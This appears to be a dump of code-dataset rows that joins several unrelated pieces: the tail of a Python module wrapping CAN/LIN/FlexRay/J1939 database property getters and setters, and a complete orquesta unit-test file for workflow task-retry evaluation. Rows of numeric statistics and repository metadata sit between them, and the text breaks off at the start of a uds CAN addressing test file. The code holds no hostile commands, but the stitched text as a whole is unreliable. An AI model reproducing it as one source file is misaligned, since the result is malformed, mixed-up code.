# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_MUX_SUBFRAME_REFS,
)
def get_signal_byte_ordr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_BYTE_ORDR,
)
def set_signal_byte_ordr(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_BYTE_ORDR,
value,
)
def get_signal_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_COMMENT,
)
def set_signal_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SIG_COMMENT,
value,
)
def get_signal_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_CONFIG_STATUS,
)
def get_signal_data_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_DATA_TYPE,
)
def set_signal_data_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_DATA_TYPE,
value,
)
def get_signal_default(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_DEFAULT,
)
def set_signal_default(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_DEFAULT,
value,
)
def get_signal_frame_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SIG_FRAME_REF,
)
def get_signal_max(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_MAX,
)
def set_signal_max(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_MAX,
value,
)
def get_signal_min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_MIN,
)
def set_signal_min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_MIN,
value,
)
def get_signal_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_NAME,
)
def set_signal_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SIG_NAME,
value,
)
def get_signal_name_unique_to_cluster(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_NAME_UNIQUE_TO_CLUSTER,
)
def get_signal_num_bits(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_NUM_BITS,
)
def set_signal_num_bits(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_NUM_BITS,
value,
)
def get_signal_pdu_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SIG_PDU_REF,
)
def get_signal_scale_fac(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_FAC,
)
def set_signal_scale_fac(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_FAC,
value,
)
def get_signal_scale_off(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_OFF,
)
def set_signal_scale_off(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_OFF,
value,
)
def get_signal_start_bit(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_START_BIT,
)
def set_signal_start_bit(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_START_BIT,
value,
)
def get_signal_unit(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_UNIT,
)
def set_signal_unit(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SIG_UNIT,
value,
)
def get_signal_mux_is_data_mux(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_SIG_MUX_IS_DATA_MUX,
)
def set_signal_mux_is_data_mux(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_SIG_MUX_IS_DATA_MUX,
value,
)
def get_signal_mux_is_dynamic(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_SIG_MUX_IS_DYNAMIC,
)
def get_signal_mux_value(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_MUX_VALUE,
)
def get_signal_mux_subfrm_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SIG_MUX_SUBFRM_REF,
)
def get_subframe_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SUBFRM_CONFIG_STATUS,
)
def get_subframe_dyn_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_SUBFRM_DYN_SIG_REFS,
)
def get_subframe_frm_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SUBFRM_FRM_REF,
)
def get_subframe_mux_value(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SUBFRM_MUX_VALUE,
)
def set_subframe_mux_value(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SUBFRM_MUX_VALUE,
value,
)
def get_subframe_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SUBFRM_NAME,
)
def set_subframe_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SUBFRM_NAME,
value,
)
def get_subframe_pdu_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SUBFRM_PDU_REF,
)
def get_subframe_name_unique_to_cluster(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SUBFRM_NAME_UNIQUE_TO_CLUSTER,
)
def get_ecu_clst_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_ECU_CLST_REF,
)
def get_ecu_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_ECU_COMMENT,
)
def set_ecu_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_ECU_COMMENT,
value,
)
def get_ecu_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_CONFIG_STATUS,
)
def get_ecu_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_ECU_NAME,
)
def set_ecu_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_ECU_NAME,
value,
)
def get_ecu_rx_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_RX_FRM_REFS,
)
def set_ecu_rx_frm_refs(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_RX_FRM_REFS,
value,
)
def get_ecu_tx_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_TX_FRM_REFS,
)
def set_ecu_tx_frm_refs(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_TX_FRM_REFS,
value,
)
def get_ecu_flex_ray_is_coldstart(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_IS_COLDSTART,
)
def get_ecu_flex_ray_startup_frame_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_STARTUP_FRAME_REF,
)
def get_ecu_flex_ray_wakeup_ptrn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_PTRN,
)
def set_ecu_flex_ray_wakeup_ptrn(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_PTRN,
value,
)
def get_ecu_flex_ray_wakeup_chs(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_CHS,
)
def set_ecu_flex_ray_wakeup_chs(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_CHS,
value,
)
def get_ecu_flex_ray_connected_chs(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_CONNECTED_CHS,
)
def set_ecu_flex_ray_connected_chs(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_CONNECTED_CHS,
value,
)
def get_ecu_lin_master(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_ECU_LIN_MASTER,
)
def set_ecu_lin_master(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_ECU_LIN_MASTER,
value,
)
def get_ecu_lin_protocol_ver(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_PROTOCOL_VER,
)
def set_ecu_lin_protocol_ver(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_PROTOCOL_VER,
value,
)
def get_ecu_lin_initial_nad(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_INITIAL_NAD,
)
def set_ecu_lin_initial_nad(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_INITIAL_NAD,
value,
)
def get_ecu_lin_config_nad(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_CONFIG_NAD,
)
def set_ecu_lin_config_nad(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_CONFIG_NAD,
value,
)
def get_ecu_lin_supplier_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_SUPPLIER_ID,
)
def set_ecu_lin_supplier_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_SUPPLIER_ID,
value,
)
def get_ecu_lin_function_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_FUNCTION_ID,
)
def set_ecu_lin_function_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_FUNCTION_ID,
value,
)
def get_ecu_lin_p2_min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_P2_MIN,
)
def set_ecu_lin_p2_min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_P2_MIN,
value,
)
def get_ecu_lin_st_min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_ST_MIN,
)
def set_ecu_lin_st_min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_ST_MIN,
value,
)
def get_ecu_j1939_preferred_address(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_J1939_PREFERRED_ADDRESS,
)
def set_ecu_j1939_preferred_address(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_J1939_PREFERRED_ADDRESS,
value,
)
def get_ecu_j1939_node_name(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u64(
ref,
_cconsts.NX_PROP_ECU_J1939_NODE_NAME,
)
def set_ecu_j1939_node_name(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u64(
ref,
_cconsts.NX_PROP_ECU_J1939_NODE_NAME,
value,
)
def get_lin_sched_clst_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_CLST_REF,
)
def get_lin_sched_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_COMMENT,
)
def set_lin_sched_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_COMMENT,
value,
)
def get_lin_sched_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_CONFIG_STATUS,
)
def get_lin_sched_entries(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRIES,
)
def get_lin_sched_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_NAME,
)
def set_lin_sched_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_NAME,
value,
)
def get_lin_sched_priority(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_PRIORITY,
)
def set_lin_sched_priority(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_PRIORITY,
value,
)
def get_lin_sched_run_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_RUN_MODE,
)
def set_lin_sched_run_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_RUN_MODE,
value,
)
def get_lin_sched_entry_collision_res_sched(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_COLLISION_RES_SCHED,
)
def set_lin_sched_entry_collision_res_sched(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_COLLISION_RES_SCHED,
value,
)
def get_lin_sched_entry_delay(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_DELAY,
)
def set_lin_sched_entry_delay(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_DELAY,
value,
)
def get_lin_sched_entry_event_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_EVENT_ID,
)
def set_lin_sched_entry_event_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_EVENT_ID,
value,
)
def get_lin_sched_entry_frames(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_FRAMES,
)
def set_lin_sched_entry_frames(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_FRAMES,
value,
)
def get_lin_sched_entry_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NAME,
)
def set_lin_sched_entry_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NAME,
value,
)
def get_lin_sched_entry_name_unique_to_cluster(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NAME_UNIQUE_TO_CLUSTER,
)
def get_lin_sched_entry_sched(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_SCHED,
)
def get_lin_sched_entry_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_TYPE,
)
def set_lin_sched_entry_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_TYPE,
value,
)
def get_lin_sched_entry_nc_ff_data_bytes(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u8_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NC_FF_DATA_BYTES,
)
def set_lin_sched_entry_nc_ff_data_bytes(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u8_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NC_FF_DATA_BYTES,
value,
)
| 19.333395 | 74 | 0.608248 | 13,468 | 104,265 | 4.173448 | 0.023612 | 0.098634 | 0.088599 | 0.140336 | 0.957551 | 0.928836 | 0.893805 | 0.858899 | 0.824456 | 0.789407 | 0 | 0.013738 | 0.281619 | 104,265 | 5,392 | 75 | 19.336981 | 0.736683 | 0.173471 | 0 | 0.709959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.127823 | false | 0.002053 | 0.00154 | 0.077259 | 0.206622 | 0.000257 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e7a891b9e9818849abaf316ccf738466d5614208 | 9,140 | py | Python | orquesta/tests/unit/conducting/test_workflow_conductor_eval_retry.py | igcherkaev/orquesta | 2baa66d33f53cb04b660b3ce284a52d478ecc528 | [
"Apache-2.0"
] | 85 | 2018-07-26T04:29:49.000Z | 2022-03-31T10:47:50.000Z | orquesta/tests/unit/conducting/test_workflow_conductor_eval_retry.py | igcherkaev/orquesta | 2baa66d33f53cb04b660b3ce284a52d478ecc528 | [
"Apache-2.0"
] | 149 | 2018-07-27T22:36:45.000Z | 2022-03-31T10:54:32.000Z | orquesta/tests/unit/conducting/test_workflow_conductor_eval_retry.py | igcherkaev/orquesta | 2baa66d33f53cb04b660b3ce284a52d478ecc528 | [
"Apache-2.0"
] | 24 | 2018-08-07T13:37:41.000Z | 2021-12-16T18:12:43.000Z | # Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta import events
from orquesta.specs import native as native_specs
from orquesta import statuses
from orquesta.tests.unit import base as test_base
class WorkflowConductorEvalTaskRetryTest(test_base.WorkflowConductorTest):
def test_no_task_retry(self):
wf_def = """
version: 1.0
description: A basic sequential workflow.
tasks:
task1:
action: core.noop
next:
- when: <% succeeded() %>
do: task2
task2:
action: core.noop
"""
# Setup workflow conductor.
spec = native_specs.WorkflowSpec(wf_def)
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Forward task1 from running to failed.
task_id = "task1"
route = 0
ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
conductor.update_task_state(task_id, route, ac_ex_event)
ac_ex_event = events.ActionExecutionEvent(statuses.FAILED)
conductor.update_task_state(task_id, route, ac_ex_event)
# Get task state for task1.
task_state_entry = conductor.get_task_state_entry(task_id, route)
# Set context for task1.
current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)
# Assert retry is false for task1.
self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))
def test_retries_exhausted(self):
wf_def = """
version: 1.0
description: A basic sequential workflow.
tasks:
task1:
action: core.noop
retry:
count: 3
next:
- when: <% succeeded() %>
do: task2
task2:
action: core.noop
"""
# Setup workflow conductor.
spec = native_specs.WorkflowSpec(wf_def)
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Forward task1 from running to failed.
task_id = "task1"
route = 0
ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
conductor.update_task_state(task_id, route, ac_ex_event)
ac_ex_event = events.ActionExecutionEvent(statuses.FAILED)
conductor.update_task_state(task_id, route, ac_ex_event)
# Get task state for task1.
task_state_entry = conductor.get_task_state_entry(task_id, route)
task_state_entry["retry"]["tally"] = 3
# Set context for task1.
current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)
# Assert retry is false for task1.
self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))
def test_retry_default_condition_satisfied(self):
wf_def = """
version: 1.0
description: A basic sequential workflow.
tasks:
task1:
action: core.noop
retry:
count: 3
next:
- when: <% succeeded() %>
do: task2
task2:
action: core.noop
"""
# Setup workflow conductor.
spec = native_specs.WorkflowSpec(wf_def)
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Forward task1 from running to failed.
task_id = "task1"
route = 0
ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
conductor.update_task_state(task_id, route, ac_ex_event)
ac_ex_event = events.ActionExecutionEvent(statuses.FAILED)
conductor.update_task_state(task_id, route, ac_ex_event)
# Get task state for task1.
task_state_entry = conductor.get_task_state_entry(task_id, route)
# Mock the task status.
task_state_entry["status"] = statuses.FAILED
# Set context for task1.
current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)
# Assert retry is true for task1.
self.assertTrue(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))
def test_retry_default_condition_not_satisfied(self):
wf_def = """
version: 1.0
description: A basic sequential workflow.
tasks:
task1:
action: core.noop
retry:
count: 3
next:
- when: <% succeeded() %>
do: task2
task2:
action: core.noop
"""
# Setup workflow conductor.
spec = native_specs.WorkflowSpec(wf_def)
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Forward task1 from running to succeeded.
task_id = "task1"
route = 0
ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
conductor.update_task_state(task_id, route, ac_ex_event)
ac_ex_event = events.ActionExecutionEvent(statuses.SUCCEEDED)
conductor.update_task_state(task_id, route, ac_ex_event)
# Get task state for task1.
task_state_entry = conductor.get_task_state_entry(task_id, route)
# Set context for task1.
current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)
# Assert retry is false for task1.
self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))
def test_retry_given_condition_satisfied(self):
wf_def = """
version: 1.0
description: A basic sequential workflow.
tasks:
task1:
action: core.noop
retry:
when: <% result().status_code = 400 %>
count: 3
next:
- when: <% succeeded() %>
do: task2
task2:
action: core.noop
"""
# Setup workflow conductor.
spec = native_specs.WorkflowSpec(wf_def)
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Forward task1 from running to succeeded.
task_id = "task1"
route = 0
task_result = {"status_code": 400}
ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
conductor.update_task_state(task_id, route, ac_ex_event)
ac_ex_event = events.ActionExecutionEvent(statuses.SUCCEEDED, result=task_result)
conductor.update_task_state(task_id, route, ac_ex_event)
# Get task state for task1.
task_state_entry = conductor.get_task_state_entry(task_id, route)
# Set context for task1.
current_task_ctx = conductor.make_task_context(task_state_entry, task_result=task_result)
# Assert retry is true for task1.
self.assertTrue(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))
def test_retry_given_condition_not_satisfied(self):
wf_def = """
version: 1.0
description: A basic sequential workflow.
tasks:
task1:
action: core.noop
retry:
when: <% result().status_code = 400 %>
count: 3
next:
- when: <% succeeded() %>
do: task2
task2:
action: core.noop
"""
# Setup workflow conductor.
spec = native_specs.WorkflowSpec(wf_def)
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Forward task1 from running to succeeded.
task_id = "task1"
route = 0
task_result = {"status_code": 200}
ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
conductor.update_task_state(task_id, route, ac_ex_event)
ac_ex_event = events.ActionExecutionEvent(statuses.SUCCEEDED, result=task_result)
conductor.update_task_state(task_id, route, ac_ex_event)
# Get task state for task1.
task_state_entry = conductor.get_task_state_entry(task_id, route)
# Set context for task1.
current_task_ctx = conductor.make_task_context(task_state_entry, task_result=task_result)
# Assert retry is false for task1.
self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))
| 34.104478 | 97 | 0.644639 | 1,059 | 9,140 | 5.299339 | 0.137866 | 0.070563 | 0.064861 | 0.032074 | 0.858874 | 0.858874 | 0.858874 | 0.858874 | 0.858874 | 0.858874 | 0 | 0.014005 | 0.281291 | 9,140 | 267 | 98 | 34.23221 | 0.840311 | 0.160175 | 0 | 0.901163 | 0 | 0 | 0.266544 | 0 | 0 | 0 | 0 | 0 | 0.034884 | 1 | 0.034884 | false | 0 | 0.02907 | 0 | 0.069767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e7a8a11f742f8dcf2162fc37fd1091884a993439 | 52,161 | py | Python | tests/software_tests/can/test_addressing_information.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 18 | 2021-03-28T22:39:18.000Z | 2022-02-13T21:50:37.000Z | tests/software_tests/can/test_addressing_information.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 153 | 2021-02-09T09:27:05.000Z | 2022-03-29T06:09:15.000Z | tests/software_tests/can/test_addressing_information.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 1 | 2021-05-13T16:01:46.000Z | 2021-05-13T16:01:46.000Z | import pytest
from mock import patch, call, MagicMock, Mock
from uds.can.addressing_information import CanAddressingInformationHandler, \
CanAddressingFormat, AddressingType, InconsistentArgumentsError, UnusedArgumentError
class TestCanAddressingInformationHandler:
"""Unit tests for `CanAddressingInformationHandler` class."""
SCRIPT_LOCATION = "uds.can.addressing_information"
def setup(self):
self._patcher_validate_addressing_format = patch(f"{self.SCRIPT_LOCATION}.CanAddressingFormat.validate_member")
self.mock_validate_addressing_format = self._patcher_validate_addressing_format.start()
self._patcher_validate_addressing_type = patch(f"{self.SCRIPT_LOCATION}.AddressingType.validate_member")
self.mock_validate_addressing_type = self._patcher_validate_addressing_type.start()
self._patcher_can_id_handler_class = patch(f"{self.SCRIPT_LOCATION}.CanIdHandler")
self.mock_can_id_handler_class = self._patcher_can_id_handler_class.start()
